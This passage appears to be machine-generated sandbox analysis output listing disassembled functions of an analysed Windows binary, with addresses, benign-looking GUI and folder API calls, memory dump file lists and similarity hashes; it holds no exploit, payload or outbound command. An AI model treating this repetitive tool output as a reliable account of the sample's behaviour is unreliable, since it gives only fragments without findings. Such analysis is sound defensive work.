                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreate$BitmapColorMode
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 451781270-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 823297d3b1078f9247b71e0cb78166e85bcb58cd2136858b8ed66297f6f43318
                                                                                                                                                                                                                                                                                                • Instruction ID: 3bfa88b0da709e4d3224c5894ad5c167e82e64c80dae2195e34fb9d2b55d46f1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 823297d3b1078f9247b71e0cb78166e85bcb58cd2136858b8ed66297f6f43318
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3931E975200600AFC724DF65D984D5BB7E9FF88700B448A2DA94A8B646DB34E944CFA5
                                                                                                                                                                                                                                                                                                Function 004650D0 Relevance: 9.1, APIs: 6, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                                • Instruction ID: c3f58fe0059228c05da5b00147ff564d140f859395390daa2f6f08e4d30ee4c4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E21FF74900F00AAE3302F21EC89717BBF4FB85741F918D2EE5C5406A0EB3594688B4A
                                                                                                                                                                                                                                                                                                Function 004256D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 156windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042571B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00425737
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,?), ref: 00425888
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$InvalidateRect
                                                                                                                                                                                                                                                                                                • String ID: Button_Check$`=
                                                                                                                                                                                                                                                                                                • API String ID: 2778011698-3236272720
                                                                                                                                                                                                                                                                                                • Opcode ID: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                                • Instruction ID: 0eaeb928ae6b5a569979d6d52056a3389dc0ef6ae13505e9256ef6b005c906b2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55510432304611DFC724EF68D8C4E9BB7A4EF88320F514A2AE95597391D774FC418BAA
                                                                                                                                                                                                                                                                                                Function 00432BF0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 144windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 00432C6E
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00432CB4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402077$3402078$tFH
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2744557037
                                                                                                                                                                                                                                                                                                • Opcode ID: 3a14f707ade8a06f74c98b1bb9dd0f0bab00e6a46749f54205f261b932b07e13
                                                                                                                                                                                                                                                                                                • Instruction ID: 0052325b0c9a5ab111783a0a252863c2f47d3c18ee4d5c8230f443e5887af2fe
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a14f707ade8a06f74c98b1bb9dd0f0bab00e6a46749f54205f261b932b07e13
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 415160712083819FD325EF20DE99FDBB7E4AF99704F00491EF18E92191CBB46948CB5A
                                                                                                                                                                                                                                                                                                Function 00416960 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenThemeData.UXTHEME(?,LISTVIEW,00000001), ref: 00416A0B
                                                                                                                                                                                                                                                                                                • DrawThemeBackground.UXTHEME(?,?,00000006,00000002,?,00000000,?,00FFFFFF), ref: 00416A5D
                                                                                                                                                                                                                                                                                                • CloseThemeData.UXTHEME(?), ref: 00416A68
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00416A89
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416430: GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416430: InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416430: GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416430: GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416430: InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectTheme$DataParent$BackgroundCloseDrawInflateInvalidateMessageOpenSendWindow
                                                                                                                                                                                                                                                                                                • String ID: LISTVIEW
                                                                                                                                                                                                                                                                                                • API String ID: 2600991427-1680257557
                                                                                                                                                                                                                                                                                                • Opcode ID: 0229e11747b3cd2e378b549adb87a154061692a6bd490272b80820133ddceee6
                                                                                                                                                                                                                                                                                                • Instruction ID: fa80797a93d1b306fb8333d11dc9e085901b6c38828278b42b81b7196f356a38
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0229e11747b3cd2e378b549adb87a154061692a6bd490272b80820133ddceee6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 415106B56083009FC314DF68C981A6BB7E9FF88744F108A2EF59987390D778E945CB96
                                                                                                                                                                                                                                                                                                Function 00424660 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130timeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00424680
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042471F
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000002,000003E8,00000000), ref: 0042474F
                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000002), ref: 00424770
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Timer$InvalidateKillRectRedrawWindow
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 4168450595-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                                • Instruction ID: 7d708aa27c06dc00fcb9f864fdcaa6ded2618e4328842cf70fbd9c9851442ce7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3941A23170021ADFC730EF65EC88B9AB3A5FF85315F50452EE85997290CB78A984CF69
                                                                                                                                                                                                                                                                                                Function 0041DC20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32 ref: 0041DC8E
                                                                                                                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0041DCBD
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(0047D9D0,00000000), ref: 0041DD06
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(1088D068,00000000), ref: 0041DD33
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Path$LongName$BrowseFolderFromList
                                                                                                                                                                                                                                                                                                • String ID: 3402075
                                                                                                                                                                                                                                                                                                • API String ID: 4132326259-2194680865
                                                                                                                                                                                                                                                                                                • Opcode ID: bd1580488c3d15575b1391a656ffdd20babe2d7e46e482bada2f60351b01d740
                                                                                                                                                                                                                                                                                                • Instruction ID: a9706069ea416aad4f302c8e8149c97dc391afa5e31a47db3cf999b1b5352ce6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd1580488c3d15575b1391a656ffdd20babe2d7e46e482bada2f60351b01d740
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD4152715083419FC314EF64DD88AABBBF4FB89710F400A3EF65A922A0DB759944CB5A
                                                                                                                                                                                                                                                                                                Function 0041A820 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                                • SHCreateDirectory.SHELL32(00000000,?,?,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
